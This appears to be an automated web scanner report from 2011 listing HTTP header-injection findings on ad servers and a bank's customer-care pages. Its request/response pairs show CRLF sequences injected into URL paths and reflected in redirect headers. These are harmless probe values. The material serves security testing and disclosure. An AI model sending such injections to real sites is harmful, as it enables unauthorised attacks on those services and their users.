1.1. http://102.xg4ken.com/media/redir.php [client parameter]
1.2. http://102.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]
1.3. http://18.xg4ken.com/media/redir.php [url[] parameter]
1.4. http://ad.br.doubleclick.net/getcamphist [src parameter]
1.5. http://ad.doubleclick.net/ad/N3867.605.ACCUWEATHER/B5097428.13 [REST URL parameter 1]
1.6. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.12 [REST URL parameter 1]
1.7. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.13 [REST URL parameter 1]
1.8. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.14 [REST URL parameter 1]
1.9. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.15 [REST URL parameter 1]
1.10. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.6 [REST URL parameter 1]
1.11. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.67 [REST URL parameter 1]
1.12. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.7 [REST URL parameter 1]
1.13. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.71 [REST URL parameter 1]
1.14. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.73 [REST URL parameter 1]
1.15. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.74 [REST URL parameter 1]
1.16. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [REST URL parameter 1]
1.17. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.4 [REST URL parameter 1]
1.18. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [REST URL parameter 1]
1.19. http://ad.doubleclick.net/adi/ocr.sant.ocregister/homepage [REST URL parameter 1]
1.20. http://ad.doubleclick.net/adj/N3285.google/B2343920.135 [REST URL parameter 1]
1.21. http://ad.doubleclick.net/adj/N553.158901.DATAXU/B4970757.4 [REST URL parameter 1]
1.22. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [REST URL parameter 1]
1.23. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [REST URL parameter 1]
1.24. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [REST URL parameter 1]
1.25. http://ad.doubleclick.net/adj/accuwx.us.radarandmaps/satellite [REST URL parameter 1]
1.26. http://ad.doubleclick.net/adj/locm.pp [REST URL parameter 1]
1.27. http://ad.doubleclick.net/adj/locm.sp [REST URL parameter 1]
1.28. http://ad.doubleclick.net/adj/locm.sp/retail_banks_15020100 [REST URL parameter 1]
1.29. http://ad.doubleclick.net/adj/ocr.sant.ocregister/homepage [REST URL parameter 1]
1.30. http://ad.doubleclick.net/jump/N3867.605.ACCUWEATHER/B5097428.13 [REST URL parameter 1]
1.31. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.13 [REST URL parameter 1]
1.32. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.14 [REST URL parameter 1]
1.33. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.6 [REST URL parameter 1]
1.34. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.67 [REST URL parameter 1]
1.35. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.7 [REST URL parameter 1]
1.36. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.71 [REST URL parameter 1]
1.37. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.72 [REST URL parameter 1]
1.38. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.73 [REST URL parameter 1]
1.39. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.74 [REST URL parameter 1]
1.40. http://ad.doubleclick.net/jump/locm.pp [REST URL parameter 1]
1.41. http://ad.doubleclick.net/jump/locm.sp [REST URL parameter 1]
1.42. http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100 [REST URL parameter 1]
1.43. https://ad.doubleclick.net/activity [name of an arbitrarily supplied request parameter]
1.44. https://ad.doubleclick.net/activity [src parameter]
1.45. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp [eyeblaster cookie]
1.46. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]
1.47. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]
1.48. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]
1.49. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]
1.50. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]
1.51. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]
1.52. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [$ parameter]
1.53. https://customercare.suntrust.com/guides/bus_services.asp [REST URL parameter 1]
1.54. https://customercare.suntrust.com/guides/contact_us.asp [REST URL parameter 1]
1.55. https://customercare.suntrust.com/guides/credit_cards.asp [REST URL parameter 1]
1.56. https://customercare.suntrust.com/guides/deposits.asp [REST URL parameter 1]
1.57. https://customercare.suntrust.com/guides/marine_lending.asp [REST URL parameter 1]
1.58. https://customercare.suntrust.com/guides/merchant_services.asp [REST URL parameter 1]
1.59. https://customercare.suntrust.com/guides/mort_services.asp [REST URL parameter 1]
1.60. http://tacoda.at.atwola.com/rtx/r.js [N cookie]
1.61. http://tacoda.at.atwola.com/rtx/r.js [si parameter]
1.62. http://www.supermedia.com/business-listings/business-profile [&tsrc parameter]
1.63. http://www.supermedia.com/spportal/spportalFlow.do [REST URL parameter 2]
Severity: | High |
Confidence: | Certain |
Host: | http://102.xg4ken.com |
Path: | /media/redir.php |
GET /media/redir.php?prof=93 Host: 102.xg4ken.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 15:42:13 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=3025018b-a68d Location: https://www.readydebit dd2c0783ef6 P3P: policyref="http://www Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 |
Severity: | High |
Confidence: | Certain |
Host: | http://102.xg4ken.com |
Path: | /media/redir.php |
GET /media/redir.php?prof=93 Host: 102.xg4ken.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 15:42:13 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=7f8fec1e-1ba4 Location: https://www.readydebit 925eb9a0928=1 P3P: policyref="http://www Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 |
Severity: | High |
Confidence: | Certain |
Host: | http://18.xg4ken.com |
Path: | /media/redir.php |
GET /media/redir.php?prof=134 Host: 18.xg4ken.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 13:42:58 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=37147d0d-185e Location: http://ad.doubleclick.net 8b43bea0858 P3P: policyref="http://www Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.br.doubleclick |
Path: | /getcamphist |
GET /getcamphist;src=1508997 Host: ad.br.doubleclick.net Proxy-Connection: keep-alive Referer: http://mapserver Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.0 302 Moved Temporarily Content-Length: 0 Location: http://metric.superpages 79c188add23&A2S=1/respcamphist;src |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /ad/N3867.605.ACCUWEATHER |
GET /6fceb%0d%0a0ed31c09936/N3867.605.ACCUWEATHER Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/6fceb 0ed31c09936/N3867.605.ACCUWEATHER Date: Thu, 03 Feb 2011 19:03:56 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /ad/N884.AccuWeather |
GET /75094%0d%0a54bf7bd2017/N884.AccuWeather Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/75094 54bf7bd2017/N884.AccuWeather Date: Thu, 03 Feb 2011 19:03:47 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /ad/N884.AccuWeather |
GET /735ad%0d%0a719906bbad3/N884.AccuWeather Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/735ad 719906bbad3/N884.AccuWeather Date: Thu, 03 Feb 2011 19:03:49 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /ad/N884.AccuWeather |
GET /6a187%0d%0ad171e8daa80/N884.AccuWeather Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/6a187 d171e8daa80/N884.AccuWeather Date: Thu, 03 Feb 2011 19:03:47 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /ad/N884.AccuWeather |
GET /93dd3%0d%0afa925ac47eb/N884.AccuWeather Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/93dd3 fa925ac47eb/N884.AccuWeather Date: Thu, 03 Feb 2011 19:03:46 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /ad/N884.AccuWeather |
GET /9863d%0d%0a65dd4847a9a/N884.AccuWeather Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/9863d 65dd4847a9a/N884.AccuWeather Date: Thu, 03 Feb 2011 19:03:54 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /ad/N884.AccuWeather |
GET /5c2b0%0d%0aeac9dd2feb/N884.AccuWeather Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5c2b0 eac9dd2feb/N884.AccuWeather Date: Thu, 03 Feb 2011 19:03:55 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /ad/N884.AccuWeather |
GET /76332%0d%0a35da929143b/N884.AccuWeather Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/76332 35da929143b/N884.AccuWeather Date: Thu, 03 Feb 2011 19:03:52 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /ad/N884.AccuWeather |
GET /2b019%0d%0a08096ae334b/N884.AccuWeather Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2b019 08096ae334b/N884.AccuWeather Date: Thu, 03 Feb 2011 19:03:52 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /ad/N884.AccuWeather |
GET /26b83%0d%0a06496caf30a/N884.AccuWeather Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/26b83 06496caf30a/N884.AccuWeather Date: Thu, 03 Feb 2011 19:03:54 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /ad/N884.AccuWeather |
GET /10128%0d%0a21b85e9ff66/N884.AccuWeather Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/10128 21b85e9ff66/N884.AccuWeather Date: Thu, 03 Feb 2011 19:03:54 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N3285.google |
GET /6b858%0d%0a3e3badc21b0/N3285.google/B2343920 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/6b858 3e3badc21b0/N3285.google/B2343920 Date: Thu, 03 Feb 2011 18:54:12 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N553.158901.DATAXU |
GET /189f2%0d%0afcaa5df54c2/N553.158901.DATAXU Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/189f2 fcaa5df54c2/N553.158901.DATAXU Date: Thu, 03 Feb 2011 16:04:41 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N6036.GoogleFinance |
GET /3f5bf%0d%0ae563ac11b96/N6036.GoogleFinance Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/3f5bf e563ac11b96/N6036.GoogleFinance Date: Thu, 03 Feb 2011 16:05:33 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/ocr.sant.ocregister |
GET /71e0e%0d%0ae9a1d806e67/ocr.sant.ocregister Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://mortgage Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/71e0e e9a1d806e67/ocr.sant.ocregister Date: Thu, 03 Feb 2011 18:53:20 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N3285.google |
GET /57a59%0d%0a2e93fa0572a/N3285.google/B2343920 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/57a59 2e93fa0572a/N3285.google/B2343920 Date: Thu, 03 Feb 2011 19:04:01 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N553.158901.DATAXU |
GET /1e148%0d%0afd24d678fa4/N553.158901.DATAXU Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/1e148 fd24d678fa4/N553.158901.DATAXU Date: Thu, 03 Feb 2011 16:09:02 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N5776.google |
GET /5164c%0d%0a54d8039e672/N5776.google.comOX2416 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5164c 54d8039e672/N5776.google.comOX2416 Date: Thu, 03 Feb 2011 16:07:00 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N5776.google |
GET /8eb0e%0d%0a1a688a7e3f5/N5776.google.comOX2416 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/8eb0e 1a688a7e3f5/N5776.google.comOX2416 Date: Thu, 03 Feb 2011 16:09:08 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N5776.google |
GET /4e029%0d%0a8d39dccd6e9/N5776.google.comOX2416 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/4e029 8d39dccd6e9/N5776.google.comOX2416 Date: Thu, 03 Feb 2011 16:07:29 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/accuwx.us.radar |
GET /42370%0d%0ad7fc4ebae71/accuwx.us.radarandmaps Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.accuweather Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/42370 d7fc4ebae71/accuwx.us.radarandmaps Date: Thu, 03 Feb 2011 18:53:19 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/locm.pp |
GET /4f6f6%0d%0af510117f0b4/locm.pp;dcopt=ist;kw Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.local.com/dart Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/4f6f6 f510117f0b4/locm.pp%3Bdcopt%3Dist Date: Thu, 03 Feb 2011 16:03:03 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/locm.sp |
GET /3fae6%0d%0a7ebdf66e13/locm.sp;dcopt=ist;kw Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.local.com/dart Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/3fae6 7ebdf66e13/locm.sp%3Bdcopt%3Dist Date: Thu, 03 Feb 2011 16:08:40 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/locm.sp/retail_banks |
GET /4b813%0d%0a38c9ae3db10/locm.sp/retail_banks Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/4b813 38c9ae3db10/locm.sp/retail_banks Date: Thu, 03 Feb 2011 16:08:48 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/ocr.sant.ocregister |
GET /7157e%0d%0a28bf7eec74/ocr.sant.ocregister Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/7157e 28bf7eec74/ocr.sant.ocregister Date: Thu, 03 Feb 2011 19:03:57 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /jump/N3867.605 |
GET /7839e%0d%0a13e7a69b9b/N3867.605.ACCUWEATHER Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/7839e 13e7a69b9b/N3867.605.ACCUWEATHER Date: Thu, 03 Feb 2011 19:03:50 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /jump/N884.AccuWeather |
GET /65bdc%0d%0a9a784ec95fb/N884.AccuWeather Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/65bdc 9a784ec95fb/N884.AccuWeather Date: Thu, 03 Feb 2011 19:03:40 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /jump/N884.AccuWeather |
GET /8f012%0d%0aa7185e3a5c9/N884.AccuWeather Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/8f012 a7185e3a5c9/N884.AccuWeather Date: Thu, 03 Feb 2011 19:03:37 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /jump/N884.AccuWeather |
GET /24bce%0d%0a68ef865ea3b/N884.AccuWeather Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/24bce 68ef865ea3b/N884.AccuWeather Date: Thu, 03 Feb 2011 19:03:47 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /jump/N884.AccuWeather |
GET /3f7d8%0d%0a26ff44bf3ad/N884.AccuWeather Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/3f7d8 26ff44bf3ad/N884.AccuWeather Date: Thu, 03 Feb 2011 19:03:46 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /jump/N884.AccuWeather |
GET /9eb91%0d%0a378d55f361c/N884.AccuWeather Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/9eb91 378d55f361c/N884.AccuWeather Date: Thu, 03 Feb 2011 19:03:44 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
